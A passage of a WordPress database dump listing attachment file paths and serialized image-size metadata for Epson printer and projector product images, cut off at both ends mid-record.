ngth\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2945,2428,'_wp_attached_file','2018/12/Epson-TM-H6000IV.png'),(2946,2428,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:28:\"2018/12/Epson-TM-H6000IV.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Epson-TM-H6000IV-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Epson-TM-H6000IV-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"Epson-TM-H6000IV-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"Epson-TM-H6000IV-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"Epson-TM-H6000IV-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2947,2429,'_wp_attached_file','2018/12/Epson-TM-T88V-i.png'),(2948,2429,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:27:\"2018/12/Epson-TM-T88V-i.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Epson-TM-T88V-i-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Epson-TM-T88V-i-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"Epson-TM-T88V-i-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"Epson-TM-T88V-i-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"Epson-TM-T88V-i-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2949,2430,'_wp_attached_file','2018/12/Epson-TM-T70II.png'),(2950,2430,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:26:\"2018/12/Epson-TM-T70II.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Epson-TM-T70II-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Epson-TM-T70II-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Epson-TM-T70II-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Epson-TM-T70II-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Epson-TM-T70II-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2951,2431,'_wp_attached_file','2018/12/Epson-L1800-Printer.png'),(2952,2431,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:31:\"2018/12/Epson-L1800-Printer.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Epson-L1800-Printer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Epson-L1800-Printer-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"Epson-L1800-Printer-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"Epson-L1800-Printer-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"Epson-L1800-Printer-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2953,2432,'_wp_attached_file','2018/12/Epson-L850-Printer.png'),(2954,2432,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:30:\"2018/12/Epson-L850-Printer.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Epson-L850-Printer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Epson-L850-Printer-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"Epson-L850-Printer-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:30:\"Epson-L850-Printer-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"Epson-L850-Printer-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2955,2433,'_wp_attached_file','2018/12/Epson-L805-Printer-.png'),(2956,2433,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:31:\"2018/12/Epson-L805-Printer-.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Epson-L805-Printer--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Epson-L805-Printer--300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"Epson-L805-Printer--300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"Epson-L805-Printer--480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"Epson-L805-Printer--20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2957,2434,'_wp_attached_file','2018/12/Epson-EB-2055.png'),(2958,2434,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:801;s:4:\"file\";s:25:\"2018/12/Epson-EB-2055.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Epson-EB-2055-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Epson-EB-2055-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Epson-EB-2055-768x513.png\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Epson-EB-2055-1024x684.png\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Epson-EB-2055-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Epson-EB-2055-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Epson-EB-2055-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Epson-EB-2055-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2959,2435,'_wp_attached_file','2018/12/Epson-EB-2142W.jpg'),(2960,2435,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:26:\"2018/12/Epson-EB-2142W.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Epson-EB-2142W-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Epson-EB-2142W-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-2142W-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-2142W-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Epson-EB-2142W-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2961,2436,'_wp_attached_file','2018/12/Epson-EB-L500W.jpg'),(2962,2436,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:26:\"2018/12/Epson-EB-L500W.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Epson-EB-L500W-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Epson-EB-L500W-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-L500W-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-L500W-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Epson-EB-L500W-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2963,2437,'_wp_attached_file','2018/12/Epson-LightScene-EV-105.jpg'),(2964,2437,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:690;s:6:\"height\";i:460;s:4:\"file\";s:35:\"2018/12/Epson-LightScene-EV-105.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Epson-LightScene-EV-105-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Epson-LightScene-EV-105-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"Epson-LightScene-EV-105-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"Epson-LightScene-EV-105-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"Epson-LightScene-EV-105-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"Epson-LightScene-EV-105-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2965,2438,'_wp_attached_file','2018/12/Epson-EB-1785W.png'),(2966,2438,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:26:\"2018/12/Epson-EB-1785W.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Epson-EB-1785W-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Epson-EB-1785W-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-1785W-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-1785W-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Epson-EB-1785W-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2967,2439,'_wp_attached_file','2018/12/Epson-EB-536Wi.png'),(2968,2439,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:26:\"2018/12/Epson-EB-536Wi.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Epson-EB-536Wi-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Epson-EB-536Wi-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-536Wi-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Epson-EB-536Wi-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Epson-EB-536Wi-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2969,2440,'_wp_attached_file','2018/12/Epson-595Wi.png'),(2970,2440,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:23:\"2018/12/Epson-595Wi.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Epson-595Wi-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Epson-595Wi-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Epson-595Wi-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Epson-595Wi-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Epson-595Wi-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2971,2441,'_wp_attached_file','2018/12/EB-L1405UNL.png'),(2972,2441,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:23:\"2018/12/EB-L1405UNL.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"EB-L1405UNL-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"EB-L1405UNL-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"EB-L1405UNL-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"EB-L1405UNL-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"EB-L1405UNL-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2973,2442,'_wp_attached_file','2018/12/Epson-EB-G7400UNL.png'),(2974,2442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:29:\"2018/12/Epson-EB-G7400UNL.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Epson-EB-G7400UNL-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Epson-EB-G7400UNL-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"Epson-EB-G7400UNL-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"Epson-EB-G7400UNL-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"Epson-EB-G7400UNL-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2975,2443,'_wp_attached_file','2018/12/Epson-EB-Z10000U.png'),(2976,2443,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:310;s:4:\"file\";s:28:\"2018/12/Epson-EB-Z10000U.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Epson-EB-Z10000U-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Epson-EB-Z10000U-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"Epson-EB-Z10000U-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"Epson-EB-Z10000U-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"Epson-EB-Z10000U-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"f